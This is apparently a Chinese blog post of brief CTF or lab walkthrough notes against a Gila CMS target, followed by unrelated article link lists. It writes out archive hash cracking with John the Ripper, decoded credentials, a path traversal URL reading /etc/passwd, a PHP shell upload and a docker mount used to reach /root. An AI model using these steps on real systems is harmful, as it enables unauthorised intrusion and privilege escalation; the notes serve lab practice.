一、信息收集

ip、端口、指纹

目录扫描

查看frp文件

密码破解

失败换一个

https://github.com/truongkma/ctf-tools/blob/master/John/run/7z2john.py

python 7z2ctf.py arjun.7z > hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

john hash --show

解码

echo 'Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=' | base64 -d

gila:admin@gmail.com:princesa

查找版本漏洞

http://192.168.152.132/gila/admin/fm/?f=src../../../../etc/passwd

修改文件

创建404php

发现docker

docker run -v /root:/mnt -it alpine

最新文章

  1. Git命令之资源
  2. scala 学习笔记(07) 一等公民的函数
  3. CSS值得关注的那些事?
  4. freeCodeCamp:Repeat a string repeat a string
  5. 什么是J2EE,包括哪些规范!
  6. HDU 1695
  7. 百度地图经纬度转换JS版
  8. Django Aggregation聚合
  9. poj2239 Selecting Courses --- 二分图最大匹配
  10. Log4Net 使用总结
  11. 文本切换器(TextSwitcher)的功能和用法
  12. spring-mvc 集成 activeMq 常见问题 + 解决方案 (仅供参考)
  13. Android初级教程理论知识(第六章广播接受者)
  14. VS.NET C# 开发ArcGis插件无法进入断点调试的解决方法
  15. 使用yum安装 gdb/g++等软件包
  16. 爬取伯乐在线文章(二)通过xpath提取源文件中需要的内容
  17. Tomcat 常见的几个报错与启动问题
  18. sed命令参数之-r -i
  19. idea上将项目上传到github
  20. FZU 2272 Frog 第八届福建省赛 (鸡兔同笼水题)

热门文章

  1. 「10.8」simple「数学」·walk「树上直径」
  2. sql数据库新建作业,新建步骤时报错从 IClassFactory 为 CLSID 为 {AA40D1D6-CAEF-4A56-B9BB-D0D3DC976BA2} 的 COM 组件创建实例失败,原因是出现以下错误: c001f011。 (Microsoft.SqlServer.ManagedDTS)
  3. Java 提效神器 Stream 的冷门技巧
  4. 关于LCA的几点想法
  5. 5、cobbler搭建本地saltstack yum仓库
  6. 47、django工程(template)
  7. 使用gitlab自带的ci/cd实现.net core应用程序的部署
  8. AcWing 1303. 斐波那契前 n 项和
  9. 如何查看wsdl文档
  10. 剖析虚幻渲染体系(06)- UE5特辑Part 2(Lumen和其它)